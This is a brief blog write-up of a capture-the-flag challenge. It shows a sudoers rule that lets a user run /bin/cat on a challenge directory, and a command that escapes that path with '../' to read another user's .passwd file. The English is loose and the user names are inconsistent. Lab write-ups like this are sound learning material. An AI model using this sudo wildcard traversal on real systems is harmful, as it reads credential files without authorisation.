Blog
We are give with two folder one is which /ch1cracked which contains passwd and /ch1 has one random file ...
$ sudo -l
User app-script-ch1 may run the following commands on this host:
(app-script-ch1-cracked) /bin/cat /challenge/app-script/ch1/ch1/
The vulnerable part is /* so we can access any file by tricking /* with ../
sudo -u ch1cracked cat blah/blah/ch1/../ch1cracked/.passwd